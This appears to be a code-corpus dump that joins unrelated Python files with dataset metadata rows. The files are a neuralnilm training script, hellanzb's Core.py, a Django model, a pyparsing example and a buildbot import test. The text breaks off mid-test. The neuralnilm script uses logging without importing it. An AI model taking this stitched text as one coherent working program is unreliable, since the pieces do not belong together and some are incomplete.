from neuralnilm import (Net, RealApplianceSource,
BLSTMLayer, DimshuffleLayer,
BidirectionalRecurrentLayer)
from neuralnilm.source import standardise, discretize, fdiff, power_and_fdiff
from neuralnilm.experiment import run_experiment, init_experiment
from neuralnilm.net import TrainingError
from neuralnilm.layers import MixtureDensityLayer
from neuralnilm.objectives import scaled_cost, mdn_nll, scaled_cost_ignore_inactive, ignore_inactive
from neuralnilm.plot import MDNPlotter
from lasagne.nonlinearities import sigmoid, rectify, tanh
from lasagne.objectives import mse
from lasagne.init import Uniform, Normal
from lasagne.layers import (LSTMLayer, DenseLayer, Conv1DLayer,
ReshapeLayer, FeaturePoolLayer, RecurrentLayer)
from lasagne.updates import nesterov_momentum, momentum
from functools import partial
import os
import __main__
from copy import deepcopy
from math import sqrt
import numpy as np
import theano.tensor as T
NAME = os.path.splitext(os.path.split(__main__.__file__)[1])[0]
PATH = "/homes/dk3810/workspace/python/neuralnilm/figures"
SAVE_PLOT_INTERVAL = 250
GRADIENT_STEPS = 100
SEQ_LENGTH = 512
source_dict = dict(
filename='/data/dk3810/ukdale.h5',
appliances=[
['fridge freezer', 'fridge', 'freezer'],
'hair straighteners',
'television'
# 'dish washer',
# ['washer dryer', 'washing machine']
],
max_appliance_powers=[300, 500, 200, 2500, 2400],
on_power_thresholds=[5] * 5,
max_input_power=5900,
min_on_durations=[60, 60, 60, 1800, 1800],
min_off_durations=[12, 12, 12, 1800, 600],
window=("2013-06-01", "2014-07-01"),
seq_length=SEQ_LENGTH,
output_one_appliance=False,
boolean_targets=False,
train_buildings=[1],
validation_buildings=[1],
skip_probability=0.0,
n_seq_per_batch=16,
subsample_target=4,
include_diff=False,
clip_appliance_power=True,
target_is_prediction=False,
independently_center_inputs = True,
standardise_input=True,
unit_variance_targets=True,
input_padding=0,
lag=0,
# reshape_target_to_2D=True,
input_stats={'mean': np.array([ 0.05526326], dtype=np.float32),
'std': np.array([ 0.12636775], dtype=np.float32)},
target_stats={
'mean': np.array([ 0.04066789, 0.01881946,
0.24639061, 0.17608672, 0.10273963],
dtype=np.float32),
'std': np.array([ 0.11449792, 0.07338708,
0.26608968, 0.33463112, 0.21250485],
dtype=np.float32)}
)
N = 50
net_dict = dict(
save_plot_interval=SAVE_PLOT_INTERVAL,
# loss_function=partial(ignore_inactive, loss_func=mdn_nll, seq_length=SEQ_LENGTH),
# loss_function=lambda x, t: mdn_nll(x, t).mean(),
loss_function=lambda x, t: mse(x, t).mean(),
# loss_function=partial(scaled_cost, loss_func=mse),
updates_func=momentum,
learning_rate=1e-2,
learning_rate_changes_by_iteration={
# 500: 5e-06
# 4000: 1e-03,
# 6000: 5e-06,
# 7000: 1e-06
# 2000: 5e-06
# 3000: 1e-05
# 7000: 5e-06,
# 10000: 1e-06,
# 15000: 5e-07,
# 50000: 1e-07
},
do_save_activations=True
# plotter=MDNPlotter
)
def exp_a(name):
# 3 appliances
global source
source_dict_copy = deepcopy(source_dict)
source = RealApplianceSource(**source_dict_copy)
net_dict_copy = deepcopy(net_dict)
net_dict_copy.update(dict(
experiment_name=name,
source=source
))
N = 25
net_dict_copy['layers_config'] = [
{
'type': BidirectionalRecurrentLayer,
'num_units': N,
'gradient_steps': GRADIENT_STEPS,
'W_in_to_hid': Normal(std=1.),
'nonlinearity': tanh
},
{
'type': FeaturePoolLayer,
'ds': 4, # number of feature maps to be pooled together
'axis': 1, # pool over the time axis
'pool_function': T.max
},
{
'type': BidirectionalRecurrentLayer,
'num_units': N,
'gradient_steps': GRADIENT_STEPS,
'W_in_to_hid': Normal(std=1/sqrt(N)),
'nonlinearity': tanh
},
{
'type': DenseLayer,
'num_units': source.n_outputs,
'W': Normal(std=1/sqrt(N)),
'nonlinearity': T.nnet.softplus
}
# {
# 'type': MixtureDensityLayer,
# 'num_units': source.n_outputs,
# 'num_components': 1,
# 'nonlinearity_mu': T.nnet.softplus
# }
]
net = Net(**net_dict_copy)
return net
def main():
# EXPERIMENTS = list('abcdefghijklmnopqrstuvwxyz')
EXPERIMENTS = list('a')
for experiment in EXPERIMENTS:
full_exp_name = NAME + experiment
func_call = init_experiment(PATH, experiment, full_exp_name)
logger = logging.getLogger(full_exp_name)
try:
net = eval(func_call)
run_experiment(net, epochs=None)
except KeyboardInterrupt:
logger.info("KeyboardInterrupt")
break
except Exception as exception:
logger.exception("Exception")
raise
finally:
logging.shutdown()
if __name__ == "__main__":
main()
| mit | -267,956,758,731,910,050 | 31.142857 | 100 | 0.600711 | false |
myusuf3/hellanzb | Hellanzb/Core.py | 1 | 24219 | """
Core - All of our main()ish functions. Initialization/shutdown/etc
(c) Copyright 2005 Philip Jenvey, Ben Bangert
[See end of file]
"""
# Install our custom twisted reactor immediately
from Hellanzb.HellaReactor import HellaReactor
HellaReactor.install()
import optparse, os, signal, sys, time, thread, threading, Hellanzb, Hellanzb.PostProcessor
from distutils import spawn
from shutil import rmtree
from socket import gethostname
from threading import Lock
from twisted.internet import reactor
from Hellanzb.Daemon import initDaemon, postProcess
from Hellanzb.HellaXMLRPC import hellaRemote, initXMLRPCClient
from Hellanzb.Log import *
from Hellanzb.Logging import initLogging, stdinEchoOn
from Hellanzb.PostProcessorUtil import defineMusicType
from Hellanzb.Util import *
__id__ = '$Id: Core.py 1053 2007-03-23 21:44:14Z pjenvey $'
def findAndLoadConfig(optionalConfigFile = None):
""" Find and load the configuration file """
if optionalConfigFile is not None:
if loadConfig(optionalConfigFile):
Hellanzb.CONFIG_FILENAME = optionalConfigFile
return
else:
error('Unable to load specified config file: ' + optionalConfigFile)
sys.exit(1)
# look for conf in this order: sys.prefix, ./, or ./etc/
confDirs = [os.path.join(sys.prefix, 'etc')]
try:
confDirs.append(os.path.join(os.getcwd(), 'etc'))
confDirs.append(os.getcwd())
except OSError, ose:
if ose.errno != 2:
raise
# OSError: [Errno 2] No such file or directory. cwd doesn't exist
# hard coding preferred Darwin config file location, kind of lame. but I'd rather do
# this then make an etc dir in os x's Python.framework directory
if Hellanzb.SYSNAME == "Darwin":
confDirs[0] = '/opt/local/etc'
for dir in confDirs:
file = os.path.join(dir, 'hellanzb.conf')
if loadConfig(file):
Hellanzb.CONFIG_FILENAME = file
return
error('Could not find configuration file in the following dirs: ' + str(confDirs))
sys.exit(1)
def loadConfig(fileName):
""" Attempt to load the specified config file. If successful, clean the variables/data the
config file has setup """
if not os.path.isfile(fileName):
return False
if not os.access(fileName, os.R_OK):
warn('Unable to read config file: ' + fileName)
return False
try:
execfile(fileName)
# Cache this operation (whether or not we're in debug mode) for faster (hardly)
# debug spamming (from NZBLeecher)
if hasattr(Hellanzb, 'DEBUG_MODE') and Hellanzb.DEBUG_MODE is not None and \
Hellanzb.DEBUG_MODE != False:
# Set this ASAP for sane logging. FIXME: You could possibly lose some debug
# output during initialization if you're using the -d option
Hellanzb.DEBUG_MODE_ENABLED = True
# Ensure the types are lower case
for varName in ('NOT_REQUIRED_FILE_TYPES', 'KEEP_FILE_TYPES'):
types = getattr(Hellanzb, varName)
lowerTypes = [ext.lower() for ext in types]
setattr(Hellanzb, varName, lowerTypes)
if not hasattr(Hellanzb, 'MAX_RATE') or Hellanzb.MAX_RATE is None:
Hellanzb.MAX_RATE = 0
else:
Hellanzb.MAX_RATE = int(Hellanzb.MAX_RATE)
if not hasattr(Hellanzb, 'UNRAR_CMD') or Hellanzb.UNRAR_CMD is None:
Hellanzb.UNRAR_CMD = assertIsExe(['rar', 'unrar'])
else:
Hellanzb.UNRAR_CMD = assertIsExe([Hellanzb.UNRAR_CMD])
if not hasattr(Hellanzb, 'PAR2_CMD') or Hellanzb.PAR2_CMD is None:
Hellanzb.PAR2_CMD = assertIsExe(['par2'])
else:
Hellanzb.PAR2_CMD = assertIsExe([Hellanzb.PAR2_CMD])
if not hasattr(Hellanzb, 'MACBINCONV_CMD') or Hellanzb.MACBINCONV_CMD is None:
# macbinconv is optional when not explicitly specified in the conf
Hellanzb.MACBINCONV_CMD = None
try:
Hellanzb.MACBINCONV_CMD = assertIsExe(['macbinconv'])
except FatalError:
pass
else:
Hellanzb.MACBINCONV_CMD = assertIsExe([Hellanzb.MACBINCONV_CMD])
if not hasattr(Hellanzb, 'SKIP_UNRAR') or Hellanzb.SKIP_UNRAR is None:
Hellanzb.SKIP_UNRAR = False
if not hasattr(Hellanzb, 'SMART_PAR'):
Hellanzb.SMART_PAR = True
if not hasattr(Hellanzb, 'CATEGORIZE_DEST'):
Hellanzb.CATEGORIZE_DEST = True
if not hasattr(Hellanzb, 'NZB_ZIPS'):
Hellanzb.NZB_ZIPS = '.nzb.zip'
if not hasattr(Hellanzb, 'NZB_GZIPS'):
Hellanzb.NZB_GZIPS = '.nzb.gz'
if not hasattr(Hellanzb, 'DISABLE_COLORS'):
Hellanzb.DISABLE_COLORS = False
if not hasattr(Hellanzb, 'DISABLE_ANSI'):
Hellanzb.DISABLE_ANSI = False
Hellanzb.CACHE_LIMIT = unPrettyBytes(getattr(Hellanzb, 'CACHE_LIMIT', 0))
if not hasattr(Hellanzb, 'OTHER_NZB_FILE_TYPES'):
# By default, just match .nzb files in the queue dir
Hellanzb.NZB_FILE_RE = re.compile(r'(?i)\.(nzb)$')
else:
nzbTypeRe = r'(?i)\.(%s)$'
if not isinstance(Hellanzb.OTHER_NZB_FILE_TYPES, list):
Hellanzb.OTHER_NZB_FILE_TYPES = [Hellanzb.OTHER_NZB_FILE_TYPES]
if 'nzb' not in Hellanzb.OTHER_NZB_FILE_TYPES:
Hellanzb.OTHER_NZB_FILE_TYPES.append('nzb')
typesStr = '|'.join(Hellanzb.OTHER_NZB_FILE_TYPES)
Hellanzb.NZB_FILE_RE = re.compile(nzbTypeRe % typesStr)
# Make sure we expand pathnames so that ~ can be used
for expandPath in ('PREFIX_DIR', 'QUEUE_DIR', 'DEST_DIR', 'POSTPONED_DIR',
'CURRENT_DIR', 'TEMP_DIR', 'PROCESSING_DIR', 'STATE_XML_FILE',
'WORKING_DIR', 'LOG_FILE', 'DEBUG_MODE',
'UNRAR_CMD', 'PAR2_CMD', 'MACBINCONV_CMD',
'EXTERNAL_HANDLER_SCRIPT'):
if hasattr(Hellanzb, expandPath):
thisDir = getattr(Hellanzb, expandPath)
if thisDir is not None:
expandedDir = os.path.expanduser(thisDir)
setattr(Hellanzb, expandPath, expandedDir)
if not hasattr(Hellanzb, 'EXTERNAL_HANDLER_SCRIPT') or \
Hellanzb.EXTERNAL_HANDLER_SCRIPT is None or \
not os.path.isfile(Hellanzb.EXTERNAL_HANDLER_SCRIPT) or \
not os.access(Hellanzb.EXTERNAL_HANDLER_SCRIPT, os.X_OK):
Hellanzb.EXTERNAL_HANDLER_SCRIPT = None
debug('Found config file in directory: ' + os.path.dirname(fileName))
return True
except FatalError, fe:
error('A problem occurred while reading the config file', fe)
raise
except Exception, e:
msg = 'An unexpected error occurred while reading the config file'
error(msg, e)
raise
# FIXME I think due to the recent change that shutdown()s, then logs -- logShutdown can be
# replaced with normal logging calls
def signalHandler(signum, frame):
""" The main and only signal handler. Handle cleanup/managing child processes before
exiting """
# CTRL-C
if signum == signal.SIGINT:
# If there aren't any proceses to wait for exit immediately
if len(Topen.activePool) == 0:
shutdown(message = 'Caught interrupt, exiting..')
return
# We can safely exit ASAP if all the processes are associated with the main thread
# (the thread processes? seem to have have already gotten the signal as well at
# this point. I'm not exactly sure why)
threadsOutsideMain = False
for topen in Topen.activePool:
if topen.threadIdent != Hellanzb.MAIN_THREAD_IDENT:
threadsOutsideMain = True
if not threadsOutsideMain:
shutdown(message = 'Caught interrupt, exiting..')
return
# We couldn't cheat our way out of the program, tell the user the processes
# (threads) we're waiting on, and wait for another signal
if Hellanzb.stopSignalCount == 0 or (time.time() - Hellanzb.firstSignal > 5):
Hellanzb.firstSignal = time.time()
Hellanzb.stopSignalCount = 1
else:
Hellanzb.stopSignalCount = Hellanzb.stopSignalCount + 1
if Hellanzb.stopSignalCount < 2:
msg = 'Caught interrupt, waiting for these child processes to finish:\n'
for topen in Topen.activePool:
pid = topen.getPid()
if pid is None:
pid = 'Init'
else:
pid = str(pid)
msg += truncateToMultiLine(topen.prettyCmd, length = 68,
prefix = pid + ' ', indentPrefix = ' '*8) + '\n'
msg += '(CTRL-C again within 5 seconds to kill them and exit immediately.\n' + \
'PostProcessors will automatically resume when hellanzb is restarted)'
warn(msg)
else:
# Kill the processes. If any processes are lying around after a kill -9, it's
# either an o/s problem (we don't care) or a bug in hellanzb (we aren't
# allowing the process to exit/still reading from it)
warn('Killing child processes..')
shutdown(message = 'Killed all child processes, exiting..',
killPostProcessors = True)
return
def init(options = {}):
""" initialize the app """
# Whether or not the app is in the process of shutting down
Hellanzb.SHUTDOWN = False
# Get logging going ASAP
initLogging()
# CTRL-C shutdown return code
Hellanzb.SHUTDOWN_CODE = 20
# defineServer's from the config file
Hellanzb.SERVERS = {}
# we can compare the current thread's ident to our MAIN_THREAD's to determine whether
# or not we may need to route things through twisted's callFromThread
Hellanzb.MAIN_THREAD_IDENT = thread.get_ident()
Hellanzb.BEGIN_TIME = time.time()
# Whether or not the downloader has been paused
Hellanzb.downloadPaused = False
# Troll threads
Hellanzb.postProcessors = []
Hellanzb.postProcessorLock = Lock()
# How many total NZB archives have been post processed
Hellanzb.totalPostProcessed = 0
# Whether or not we're a downloader process
Hellanzb.IS_DOWNLOADER = False
# Whether or not the queue daemon is running as a daemon process (forked)
Hellanzb.DAEMONIZE = False
# Whether or not debug logging is enabled
Hellanzb.DEBUG_MODE_ENABLED = False
# How many times CTRL-C has been pressed
Hellanzb.stopSignalCount = 0
# When the first CTRL-C was pressed
Hellanzb.firstSignal = None
# Message printed before exiting
Hellanzb.shutdownMessage = None
# Whether or not this is a hellanzb download daemon process
Hellanzb.isDaemon = False
# Whether or not we're currently downloading an NZB
Hellanzb.downloading = False
# The name of the loaded config file
Hellanzb.CONFIG_FILENAME = None
# hostname we're running on
Hellanzb.HOSTNAME = gethostname()
if isWindows():
Hellanzb.SYSNAME = None
else:
(sysname, nodename, release, version, machine) = os.uname()
# The OS in use
Hellanzb.SYSNAME = sysname
# Only add anonymous NZB files placed in the QUEUE_DIR to the NZBQueue after this
# number have seconds have passed since the files modification time
Hellanzb.NZBQUEUE_MDELAY = 10
# Whether or not the C yenc module is installed
try:
import _yenc
Hellanzb.HAVE_C_YENC = True
except ImportError:
Hellanzb.HAVE_C_YENC = False
Hellanzb.PACKAGER = find_packager()
if isPy2App():
# Append the py2app Contents/Resources dir to the PATH
import __main__
os.environ['PATH'] = os.environ['PATH'] + ':' + \
os.path.dirname(os.path.abspath(__main__.__file__))
# Twisted will replace this with its own signal handler when initialized
signal.signal(signal.SIGINT, signalHandler)
outlineRequiredDirs() # before the config file is loaded
if hasattr(options, 'configFile') and options.configFile is not None:
findAndLoadConfig(options.configFile)
else:
findAndLoadConfig()
# FIXME: these blocks below, and some code in loadConfig should all be pulled out into
# a post-loadConfig normalizeConfig function. Could we skip any of this init stuff
# when just making an RPC call (to reduce startup time)?
for attr in ('logFile', 'debugLogFile'):
# this is really: logFile = None
setattr(sys.modules[__name__], attr, None)
if hasattr(options, attr) and getattr(options, attr) is not None:
setattr(sys.modules[__name__], attr, getattr(options, attr))
Hellanzb.Logging.initLogFile(logFile = logFile, debugLogFile = debugLogFile)
# overwrite xml rpc vars from the command line options if they were set
for option, attr in { 'rpcServer': 'XMLRPC_SERVER',
'rpcPassword': 'XMLRPC_PASSWORD',
'rpcPort': 'XMLRPC_PORT' }.iteritems():
if hasattr(options, option) and getattr(options, option) is not None:
setattr(Hellanzb, attr, getattr(options, option))
if not hasattr(Hellanzb, 'DELETE_PROCESSED'):
Hellanzb.DELETE_PROCESSED = True
if hasattr(Hellanzb, 'UMASK'):
try:
Hellanzb.UMASK = int(Hellanzb.UMASK)
except ValueError:
error('Config file option: Hellanzb.UMASK is not a valid integer')
sys.exit(1)
if not hasattr(Hellanzb, 'LIBNOTIFY_NOTIFY'):
Hellanzb.LIBNOTIFY_NOTIFY = False
elif Hellanzb.LIBNOTIFY_NOTIFY:
try:
import pynotify
except ImportError:
error('Please install notify-python or disable Hellanzb.LIBNOTIFY_NOTIFY')
sys.exit(1)
if not pynotify.init('hellanzb'):
error('Cannot initialize libnotify')
sys.exit(1)
if not hasattr(Hellanzb, 'GROWL_NOTIFY'):
error('Required option not defined in config file: Hellanzb.GROWL_NOTIFY')
sys.exit(1)
elif Hellanzb.GROWL_NOTIFY:
errors = []
for attr in ('GROWL_SERVER', 'GROWL_PASSWORD'):
if not hasattr(Hellanzb, attr):
err = 'Hellanzb.GROWL_NOTIFY enabled. Required option not defined in config file: Hellanzb.'
errors.append(err + attr)
if len(errors):
[error(err) for err in errors]
sys.exit(1)
def outlineRequiredDirs():
""" Set all required directory attrs to None. they will be checked later for this value to
ensure they have been set """
requiredDirs = [ 'PREFIX', 'QUEUE', 'DEST', 'CURRENT', 'WORKING',
'POSTPONED', 'PROCESSING', 'TEMP' ]
for dir in requiredDirs:
setattr(Hellanzb, dir + '_DIR', None)
def shutdown(killPostProcessors = False, message = None):
""" Turn the knob that tells all parts of the program we're shutting down, optionally kill
any sub processes (that could prevent the program from exiting) and kill the twisted
reactor """
if Hellanzb.SHUTDOWN:
# shutdown already triggered
return
# that knob, that threads (PostProcessors) will check on before doing significant work
Hellanzb.SHUTDOWN = True
if killPostProcessors:
# However PostProcessors may be running sub-processes, which are all kill -9ed
# here
Topen.killAll()
if not getattr(Hellanzb, 'shutdownMessage', None):
Hellanzb.shutdownMessage = message
# stop the twisted reactor
if reactor.running:
# hellanzb downloader processes will call finishShutdown after reactor.run has
# completed (it has to: because the system event trigger below does NOT ensure
# finishShutdown is called in the final reactor iteration)
if not Hellanzb.IS_DOWNLOADER:
reactor.addSystemEventTrigger('after', 'shutdown', finishShutdown)
reactor.stop()
else:
finishShutdown()
def finishShutdown():
""" Last minute calls prior to shutdown """
# Just in case we left it off
stdinEchoOn()
if hasattr(Hellanzb, 'DOWNLOAD_TEMP_DIR'):
# Remove the temporary files with the encoded data. Any errors causing hellanzb to
# shut down prematurely (like can't bind to specific port -- maybe another
# hellanzb is running?) should unset this var so this doesn't get called
try:
rmtree(Hellanzb.DOWNLOAD_TEMP_DIR)
except OSError:
pass
if hasattr(Hellanzb, 'DEQUEUED_NZBS_DIR'):
rmtree(Hellanzb.DEQUEUED_NZBS_DIR)
if Hellanzb.shutdownMessage:
logShutdown(Hellanzb.shutdownMessage)
def shutdownAndExit(returnCode = 0, message = None):
""" Shutdown hellanzb's twisted reactor, AND call sys.exit """
shutdown(killPostProcessors = True, message = message)
sys.exit(returnCode)
def marquee():
""" Print a simple header, for when starting the app """
info('', saveRecent = False)
msg = 'hellanzb v' + Hellanzb.version
options = ['config = %s' % Hellanzb.CONFIG_FILENAME]
if Hellanzb.DAEMONIZE:
options.append('daemonized')
if Hellanzb.HAVE_C_YENC:
options.append('C yenc module')
if Hellanzb.MACBINCONV_CMD is not None:
options.append('MacBinary')
optionLen = len(options)
msg += ' (%s)' % ', '.join(options)
info(msg)
debug(msg)
USAGE = """
hellanzb version %s
""".lstrip() + cmHella().rstrip() + \
"""
nzb downloader and post processor
http://www.hellanzb.com
usage: %s [options] [remote-call] [remote-call-options]
hellanzb will by default (no remote-call specified) start its one and only
queue daemon. Specifying a remote call will attempt to talk to that already
running queue daemon via XML-RPC.
remote-calls (via XML-RPC):
%s
""".rstrip()
def parseArgs():
""" Parse the command line args """
# prevent optparse from totally munging usage
formatter = optparse.IndentedHelpFormatter()
formatter.format_usage = lambda usage: usage
# Initialize this here, so we can probe it for xml rpc client commands in the usage
initXMLRPCClient()
from Hellanzb.HellaXMLRPC import RemoteCall
usage = USAGE % (str(Hellanzb.version), '%prog', RemoteCall.allUsage())
parser = optparse.OptionParser(formatter = formatter, usage = usage, version = Hellanzb.version)
parser.add_option('-c', '--config', type='string', dest='configFile',
help='specify the configuration file')
parser.add_option('-l', '--log-file', type='string', dest='logFile',
help='specify the log file (overwrites the Hellanzb.LOG_FILE config file setting)')
parser.add_option('-d', '--debug-file', type='string', dest='debugLogFile',
help='specify the debug log file (turns on debugging output/overwrites the ' + \
'Hellanzb.DEBUG_MODE config file setting)')
if not isWindows():
parser.add_option('-D', '--daemon', action='store_true', dest='daemonize',
help='run hellanzb as a daemon process (fork and exit)')
#parser.add_option('-n', '--just-download-nzb', type='string', dest='justDownload',
# help='download the specified nzb and exit the program (do not post process)')
parser.add_option('-p', '--post-process-dir', type='string', dest='postProcessDir',
help='post-process the specified nzb archive dir either in an already running hellanzb' + \
' (via xmlrpc) if one is available, otherwise in the current process. then exit')
parser.add_option('-P', '--rar-password', type='string', dest='rarPassword',
help='when used with the -p option, specifies the nzb archive\'s rar password')
parser.add_option('-L', '--local-post-process', action='store_true', dest='localPostProcess',
help='when used with the -p option, do the post processing work in the current ' + \
'process (do not attempt to contact an already running queue daemon)')
parser.add_option('-r', '--rpc-server', type='string', dest='rpcServer',
help='specify the rpc server hostname (overwrites Hellanzb.XMLRPC_SERVER config file setting)')
parser.add_option('-s', '--rpc-password', type='string', dest='rpcPassword',
help='specify the rpc server password (overwrites Hellanzb.XMLRPC_PASSWORD config file setting)')
parser.add_option('-t', '--rpc-port', type='int', dest='rpcPort',
help='specify the rpc server port (overwrites Hellanzb.XMLRPC_PORT config file setting)')
return parser.parse_args()
def processArgs(options, args):
""" By default (no args) run the daemon. Otherwise we could be making an XML RPC call, or
calling a PostProcessor on the specified dir then exiting """
if not len(args) and not options.postProcessDir:
Hellanzb.IS_DOWNLOADER = True
if getattr(options, 'daemonize', False):
# Run as a daemon process (fork)
Hellanzb.DAEMONIZE = True
marquee()
initDaemon()
elif options.postProcessDir and options.localPostProcess:
marquee()
reactor.callLater(0, postProcess, options)
reactor.run()
else:
try:
hellaRemote(options, args)
except SystemExit:
# sys.exit throws this, let it go
raise
except FatalError, fe:
error('Exiting', fe)
shutdownAndExit(1)
except Exception, e:
error('An unexpected problem occurred, exiting', e)
shutdown()
raise
def main():
""" Program main loop. Always called from the main thread """
options, args = parseArgs()
try:
init(options)
except SystemExit:
# sys.exit throws this, let it go
raise
except FatalError, fe:
error('Exiting', fe)
shutdownAndExit(1)
except Exception, e:
error('An unexpected problem occurred, exiting', e)
shutdown()
raise
processArgs(options, args)
"""
Copyright (c) 2005 Philip Jenvey <[email protected]>
Ben Bangert <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author or contributors may not be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
$Id: Core.py 1053 2007-03-23 21:44:14Z pjenvey $
"""
| bsd-3-clause | 6,536,546,247,990,956,000 | 39.432387 | 119 | 0.639044 | false |
jeffmcnd/tfrs | server/models/FuelSupplier.py | 2 | 1714 | """
REST API Documentation for the NRS TFRS Credit Trading Application
The Transportation Fuels Reporting System is being designed to streamline compliance reporting for transportation fuel suppliers in accordance with the Renewable & Low Carbon Fuel Requirements Regulation.
OpenAPI spec version: v1
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import datetime
from django.db import models
from django.utils import timezone
from .FuelSupplierStatus import FuelSupplierStatus
from .FuelSupplierType import FuelSupplierType
from .FuelSupplierActionsType import FuelSupplierActionsType
from auditable.models import Auditable
class FuelSupplier(Auditable):
name = models.CharField(max_length=500)
fuelSupplierStatusFK = models.ForeignKey('FuelSupplierStatus', related_name='FuelSupplierfuelSupplierStatusFK')
fuelSupplierTypeFK = models.ForeignKey('FuelSupplierType', related_name='FuelSupplierfuelSupplierTypeFK')
fuelSupplierActionsTypeFK = models.ForeignKey('FuelSupplierActionsType', related_name='FuelSupplierfuelSupplierActionsTypeFK')
createdDate = models.DateField()
class Meta:
db_table = 'FUEL_SUPPLIER'
| apache-2.0 | -1,584,284,232,255,401,200 | 41.775 | 208 | 0.773046 | false |
FrankBian/kuma | vendor/packages/pyparsing/examples/indentedGrammarExample.py | 16 | 1927 | # indentedGrammarExample.py
#
# Copyright (c) 2006, Paul McGuire
#
# A sample of a pyparsing grammar using indentation for
# grouping (like Python does).
#
from pyparsing import *
data = """\
def A(z):
A1
B = 100
G = A2
A2
A3
B
def BB(a,b,c):
BB1
def BBA():
bba1
bba2
bba3
C
D
def spam(x,y):
def eggs(z):
pass
"""
indentStack = [1]
def checkPeerIndent(s,l,t):
curCol = col(l,s)
if curCol != indentStack[-1]:
if (not indentStack) or curCol > indentStack[-1]:
raise ParseFatalException(s,l,"illegal nesting")
raise ParseException(s,l,"not a peer entry")
def checkSubIndent(s,l,t):
curCol = col(l,s)
if curCol > indentStack[-1]:
indentStack.append( curCol )
else:
raise ParseException(s,l,"not a subentry")
def checkUnindent(s,l,t):
if l >= len(s): return
curCol = col(l,s)
if not(curCol < indentStack[-1] and curCol <= indentStack[-2]):
raise ParseException(s,l,"not an unindent")
def doUnindent():
indentStack.pop()
INDENT = lineEnd.suppress() + empty + empty.copy().setParseAction(checkSubIndent)
UNDENT = FollowedBy(empty).setParseAction(checkUnindent)
UNDENT.setParseAction(doUnindent)
stmt = Forward()
suite = Group( OneOrMore( empty + stmt.setParseAction( checkPeerIndent ) ) )
identifier = Word(alphas, alphanums)
funcDecl = ("def" + identifier + Group( "(" + Optional( delimitedList(identifier) ) + ")" ) + ":")
funcDef = Group( funcDecl + INDENT + suite + UNDENT )
rvalue = Forward()
funcCall = Group(identifier + "(" + Optional(delimitedList(rvalue)) + ")")
rvalue << (funcCall | identifier | Word(nums))
assignment = Group(identifier + "=" + rvalue)
stmt << ( funcDef | assignment | identifier )
print data
parseTree = suite.parseString(data)
import pprint
pprint.pprint( parseTree.asList() )
| mpl-2.0 | 6,896,793,203,863,243,000 | 22.705128 | 98 | 0.6274 | false |
pmisik/buildbot | master/buildbot/test/regressions/test_oldpaths.py | 5 | 4230 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import warnings
from twisted.trial import unittest
from buildbot.warnings import DeprecatedApiWarning
def deprecatedImport(fn):
def wrapper(self):
fn(self)
warnings = self.flushWarnings()
# on older Pythons, this warning appears twice, so use collapse it
if len(warnings) == 2 and warnings[0] == warnings[1]:
del warnings[1]
self.assertEqual(len(warnings), 1, "got: %r" % (warnings,))
self.assertEqual(warnings[0]['category'], DeprecatedApiWarning)
return wrapper
class OldImportPaths(unittest.TestCase):
"""
Test that old, deprecated import paths still work.
"""
def test_scheduler_Scheduler(self):
from buildbot.scheduler import Scheduler
assert Scheduler
def test_schedulers_basic_Scheduler(self):
# renamed to basic.SingleBranchScheduler
from buildbot.schedulers.basic import Scheduler
assert Scheduler
def test_scheduler_AnyBranchScheduler(self):
from buildbot.scheduler import AnyBranchScheduler
assert AnyBranchScheduler
def test_scheduler_basic_Dependent(self):
from buildbot.schedulers.basic import Dependent
assert Dependent
def test_scheduler_Dependent(self):
from buildbot.scheduler import Dependent
assert Dependent
def test_scheduler_Periodic(self):
from buildbot.scheduler import Periodic
assert Periodic
def test_scheduler_Nightly(self):
from buildbot.scheduler import Nightly
assert Nightly
def test_scheduler_Triggerable(self):
from buildbot.scheduler import Triggerable
assert Triggerable
def test_scheduler_Try_Jobdir(self):
from buildbot.scheduler import Try_Jobdir
assert Try_Jobdir
def test_scheduler_Try_Userpass(self):
from buildbot.scheduler import Try_Userpass
assert Try_Userpass
def test_schedulers_filter_ChangeFilter(self):
# this was the location of ChangeFilter until 0.8.4
from buildbot.schedulers.filter import ChangeFilter
assert ChangeFilter
def test_process_base_Build(self):
from buildbot.process.base import Build
assert Build
def test_buildrequest_BuildRequest(self):
from buildbot.buildrequest import BuildRequest
assert BuildRequest
def test_process_subunitlogobserver_SubunitShellCommand(self):
from buildbot.process.subunitlogobserver import SubunitShellCommand
assert SubunitShellCommand
def test_steps_source_Source(self):
